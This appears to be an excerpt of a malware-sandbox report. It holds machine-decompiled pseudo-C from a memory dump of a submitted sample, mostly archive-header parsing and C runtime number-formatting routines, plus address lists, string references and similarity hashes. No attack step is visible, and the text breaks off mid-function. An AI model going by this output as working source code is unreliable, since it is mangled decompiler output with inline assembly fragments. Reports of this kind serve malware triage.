											 *(_t541 + 0x1100) =  *(_t541 + 0x1100) & 0x00000000;
											_t292 = E0006C6E0(_t504);
											 *(_t547 + 0x64) = _t292;
											 *(_t541 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t450 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t541 + 0x1c)) = _t450;
											__eflags = _t450 - 0x32;
											if(_t450 != 0x32) {
												 *((intOrPtr*)(_t541 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t541 + 0x18)) = E0006C6E0(_t504);
											_t523 = E0006C6E0(_t504);
											 *(_t541 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t541 + 0x18));
											 *(_t541 + 0x10f8) =  *(_t395 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t541 + 0x10fc;
													 *_t177 =  *(_t541 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t541 + 0x10fc) = 1;
											}
											_t456 =  *(_t541 + 8);
											 *(_t541 + 0x1098) = _t456 >> 0x00000003 & 1;
											 *(_t541 + 0x10fa) = _t456 >> 0x00000005 & 1;
											__eflags =  *(_t547 + 0x60) - 2;
											_t459 =  *(_t547 + 0x64);
											 *(_t541 + 0x1099) = _t456 >> 0x00000004 & 1;
											if( *(_t547 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t459 & 0x00000040;
												if((_t459 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t541 + 0x10f0)) = _t302;
												_t304 =  *(_t541 + 0x1094) & 1;
												 *(_t541 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t541 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t541 + 0x109c) =  ~( *(_t541 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t523 - 0x1fff;
												if(_t523 >= 0x1fff) {
													_t523 = 0x1fff;
												}
												E0006C642(_t547 + 0x30, _t547 - 0x2074, _t523);
												 *((char*)(_t547 + _t523 - 0x2074)) = 0;
												_push(0x800);
												_t524 = _t541 + 0x28;
												_push(_t541 + 0x28);
												_push(_t547 - 0x2074);
												E00071430();
												_t463 =  *(_t547 + 0x58);
												__eflags = _t463 |  *(_t547 + 0x54);
												if((_t463 |  *(_t547 + 0x54)) != 0) {
													E00062162(_t395, _t547 + 0x30, _t463, _t541);
												}
												_t319 =  *(_t547 + 0x60);
												__eflags =  *(_t547 + 0x60) - 2;
												if( *(_t547 + 0x60) != 2) {
													L72:
													_t320 = E000835E9(_t319, _t524, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t395 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00062093(_t395, _t541);
													_t319 =  *(_t547 + 0x60);
													__eflags =  *(_t547 + 0x60) - 2;
													if( *(_t547 + 0x60) == 2) {
														L74:
														__eflags =  *(_t547 + 0x6b);
														if(__eflags != 0) {
															E00061F94(__eflags, 0x1c, _t395 + 0x24, _t524);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t504;
										if(_t290 > _t504) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t502 - 4;
								if(_t502 == 4) {
									_t471 = 5;
									memcpy(_t395 + 0x2248, _t395 + 0x21e4, _t471 << 2);
									_t331 = E0006C6E0(_t502);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t395 + 0x225c) = E0006C6E0(_t502) & 0x00000001;
										_t335 = E0006C593(_t547 + 0x30) & 0x000000ff;
										 *(_t395 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E0006C642(_t547 + 0x30, _t395 + 0x2264, 0x10);
											__eflags =  *(_t395 + 0x225c);
											if( *(_t395 + 0x225c) != 0) {
												E0006C642(_t547 + 0x30, _t395 + 0x2274, 8);
												E0006C642(_t547 + 0x30, _t547 + 0x64, 4);
												E0006F8C7(_t547 - 0x74);
												E0006F90D(_t547 - 0x74, _t395 + 0x2274, 8);
												_push(_t547 + 8);
												E0006F7D6(_t547 - 0x74);
												_t350 = E0007FDFA(_t547 + 0x64, _t547 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t395 + 0x225c) = _t352;
											}
											 *((char*)(_t395 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t547);
										E0006400A();
										E00063FB5(_t395, _t395 + 0x24, _t547);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t502 - 5;
								if(_t502 == 5) {
									_t480 = _t502;
									memcpy(_t395 + 0x4590, _t395 + 0x21e4, _t480 << 2);
									 *(_t395 + 0x45ac) = E0006C6E0(_t502) & 0x00000001;
									 *((short*)(_t395 + 0x45ae)) = 0;
									 *((char*)(_t395 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t485 = E0006C6E0(_t500);
							 *(_t547 + 0x54) = _t500;
							_t256 = 0;
							 *(_t547 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t485 -  *(_t395 + 0x21f0);
							if(_t485 >=  *(_t395 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E0006204E(_t395);
						 *((char*)(_t395 + 0x6cc4)) = 1;
						E00066FC6(0xa0f50, 3);
						__eflags =  *((char*)(_t547 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00061F94(__eflags, 4, _t395 + 0x24, _t395 + 0x24);
							 *((char*)(_t395 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00063F74(_t395, _t500);
					goto L86;
				}
				_t500 =  *((intOrPtr*)(_t395 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t559 =  *((intOrPtr*)(_t395 + 0x6ca4));
				if(_t559 < 0 || _t559 <= 0 &&  *((intOrPtr*)(_t395 + 0x6ca0)) <= _t500) {
					goto L15;
				} else {
					 *((char*)(_t547 + 0x6a)) = 1;
					 *0x93260(_t547 + 0x18, 0x10);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t395 + 0xc))))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t547 + 0x6b) = 1;
						L8:
						E00063DE0(_t395);
						_t531 = _t395 + 0x2264;
						_t546 = _t395 + 0x1028;
						E00066249(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t395 + 0x2264, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
						if( *(_t395 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t547 + 0x50)) = _t546;
							goto L16;
						} else {
							_t379 = _t395 + 0x2274;
							while(1) {
								_t381 = E0007FDFA(_t547 + 0x28, _t379, 8);
								_t549 = _t549 + 0xc;
								if(_t381 == 0) {
									goto L13;
								}
								_t566 =  *(_t547 + 0x6b);
								_t382 = _t395 + 0x24;
								_push(_t382);
								_push(_t382);
								if( *(_t547 + 0x6b) != 0) {
									_push(6);
									E00061F94(__eflags);
									 *((char*)(_t395 + 0x6cc5)) = 1;
									E00066FC6(0xa0f50, 0xb);
									goto L86;
								}
								_push(0x80);
								E00061F94(_t566);
								E0006EB27( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024);
								E00063DE0(_t395);
								E00066249(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t531, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
								_t379 = _t395 + 0x2274;
								if( *(_t395 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t393 = E00071356();
					 *(_t547 + 0x6b) = 0;
					if(_t393 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00063281
0x00063282
0x0006328a
0x00063294
0x0006329b
0x000632a2
0x000632a9
0x000632ac
0x000632b5
0x0006340b
0x0006340b
0x0006340e
0x0006340e
0x0006341b
0x0006342c
0x00063433
0x00063443
0x0006344d
0x0006344f
0x00063456
0x00063458
0x00063a88
0x00063a8a
0x00063a8f
0x00063a92
0x00063aa0
0x00063aab
0x00063aab
0x0006345e
0x00063460
0x00000000
0x00000000
0x00063466
0x0006346c
0x0006346e
0x0006346e
0x00063470
0x00063473
0x00000000
0x00000000
0x00063479
0x0006347c
0x00000000
0x00000000
0x00063482
0x00063486
0x0006348b
0x0006348e
0x00000000
0x00000000
0x00063493
0x000634a5
0x000634ab
0x000634b0
0x000634bb
0x000634bd
0x000634c6
0x000634cc
0x000634d2
0x000634d8
0x000634db
0x000634de
0x000634e0
0x0006351a
0x0006351a
0x0006351c
0x00063523
0x00063526
0x00063529
0x00063553
0x00063553
0x0006355a
0x0006355c
0x0006355f
0x00063562
0x00063567
0x0006356c
0x0006356e
0x00063571
0x00063571
0x0006357c
0x00063589
0x00063598
0x000635a1
0x000635a9
0x000635b0
0x000635b6
0x000635b8
0x000639c9
0x000639d8
0x000639d9
0x000639e3
0x000639ec
0x000639f9
0x00063a08
0x00063a13
0x00063a16
0x00063a1c
0x00063a22
0x00063a24
0x00063a2a
0x00063a2d
0x00063a44
0x00063a2f
0x00063a37
0x00063a3f
0x00063a41
0x00063a41
0x00063a4a
0x00063a51
0x00063a5b
0x00063a5b
0x00000000
0x00063a53
0x00063a53
0x00063a59
0x00063a5d
0x00063a5d
0x00063a63
0x00063a68
0x00063a6b
0x00063a7b
0x00063a7b
0x00063a80
0x00063a83
0x00000000
0x00063a83
0x00000000
0x00063a59
0x00063a51
0x000635be
0x00000000
0x00000000
0x000635c4
0x000635c7
0x00063709
0x00063711
0x00063720
0x00063724
0x00063727
0x0006372e
0x00063735
0x00063740
0x00063743
0x00063749
0x00063752
0x00063759
0x00063767
0x00063772
0x00063781
0x00063781
0x00063783
0x00063789
0x0006378f
0x00063796
0x0006379c
0x0006379c
0x000637a2
0x000637a8
0x000637ae
0x000637b4
0x000637ba
0x000637bc
0x000637c4
0x000637c4
0x000637c6
0x00000000
0x000637be
0x000637be
0x000637c8
0x000637c8
0x000637d1
0x000637d7
0x000637dc
0x000637e3
0x000637e6
0x000637f9
0x000637f9
0x000637fe
0x00063805
0x0006380c
0x00063811
0x00063820
0x00063820
0x00063826
0x00063830
0x00063837
0x00063840
0x00063848
0x0006384b
0x0006384e
0x00063851
0x00063853
0x00063853
0x00063865
0x00063879
0x0006387b
0x00063885
0x0006388a
0x00063890
0x00063892
0x0006389c
0x0006389e
0x000638a0
0x000638a0
0x000638a0
0x000638a0
0x00063894
0x00063894
0x00063894
0x000638a7
0x000638b1
0x000638c3
0x000638c9
0x000638cd
0x000638d0
0x000638d6
0x000638e1
0x000638e1
0x000638e1
0x00000000
0x000638d8
0x000638d8
0x000638db
0x00000000
0x00000000
0x000638dd
0x000638e3
0x000638e3
0x000638ef
0x000638f4
0x00063909
0x0006390f
0x0006391e
0x00063923
0x0006392e
0x00063930
0x00063932
0x00063932
0x0006393f
0x00063944
0x00063952
0x00063957
0x0006395a
0x0006395b
0x0006395c
0x00063961
0x00063966
0x00063969
0x00063973
0x00063973
0x00063978
0x0006397b
0x0006397e
0x00063990
0x00063996
0x0006399d
0x0006399f
0x000639a1
0x000639a1
0x00000000
0x00063980
0x00063983
0x00063988
0x0006398b
0x0006398e
0x000639a8
0x000639a8
0x000639ac
0x000639b9
0x000639b9
0x00000000
0x000639ac
0x00000000
0x0006398e
0x0006397e
0x000638d6
0x000637c0
0x000637c2
0x00000000
0x00000000
0x00000000
0x000637c2
0x000637bc
0x000635cd
0x000635d0
0x00063611
0x0006361e
0x00063623
0x00063628
0x0006362a
0x00063661
0x0006366c
0x0006366f
0x00063675
0x00063678
0x0006368e
0x00063693
0x0006369a
0x000636a8
0x000636b6
0x000636bf
0x000636cb
0x000636d3
0x000636d8
0x000636e7
0x000636f1
0x000636f3
0x000636f3
0x000636f5
0x000636f5
0x000636fb
0x00000000
0x000636fb
0x0006367a
0x0006367b
0x00063632
0x00063635
0x00063637
0x00063638
0x0006364a
0x00000000
0x0006364a
0x0006362c
0x0006362d
0x00000000
0x0006362d
0x000635d2
0x000635d5
0x000635dc
0x000635e9
0x000635f5
0x000635fd
0x00063604
0x00063604
0x00000000
0x000635d5
0x00063533
0x00063535
0x00063538
0x0006353a
0x0006353d
0x0006353f
0x00000000
0x00000000
0x00063541
0x00000000
0x00000000
0x00063547
0x0006354d
0x00000000
0x00000000
0x00000000
0x0006354d
0x000634e4
0x000634f0
0x000634f7
0x000634fc
0x00063500
0x00000000
0x00063502
0x00063509
0x0006350e
0x00000000
0x0006350e
0x00063500
0x0006341d
0x0006341f
0x00000000
0x0006341f
0x000632c3
0x000632c6
0x000632c8
0x000632ce
0x00000000
0x000632e2
0x000632ea
0x000632f3
0x00063300
0x00000000
0x00000000
0x00063313
0x00063322
0x00063322
0x00063326
0x00063328
0x00063344
0x00063350
0x0006335c
0x00063368
0x000633e7
0x000633e7
0x00000000
0x0006336a
0x0006336a
0x00063370
0x00063377
0x0006337c
0x00063381
0x00000000
0x00000000
0x00063383
0x00063387
0x0006338a
0x0006338b
0x0006338c
0x000633ec
0x000633ee
0x000633fa
0x00063401
0x00000000
0x00063401
0x0006338e
0x00063393
0x000633a4
0x000633ab
0x000633d3
0x000633df
0x000633e5
0x00000000
0x00000000
0x00000000
0x000633e5
0x00000000
0x00063370
0x00063368
0x00063315
0x0006331a
0x00063320
0x00000000
0x00000000
0x00000000
0x00063320

APIs

__EH_prolog.LIBCMT ref: 0006328A
_memcmp.LIBVCRUNTIME ref: 00063377

Strings

CMT, xrefs: 00063990
hc%u, xrefs: 0006367B
h%u, xrefs: 0006362D

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 533e26a7b5dc9484b56edee6226ba5d0801ccd260dede271d71f06583a154235
Instruction ID: 4c3547046214023e112a317b7ea818f3ffd26ddc78f8543670080b3a485e2149
Opcode Fuzzy Hash: 533e26a7b5dc9484b56edee6226ba5d0801ccd260dede271d71f06583a154235
Instruction Fuzzy Hash: AD3291715147849FEF14DF64C895AEA37E6AF15300F04447EFD8A8B283DB74AA48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 77%

			E0008D00E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x9e668; // 0x136d1c5
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E0008CB27( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E00089154( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E0008EC00(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E00091A60(E0008ED10(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E0007F350(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E0007F350(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E0007E7C0(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
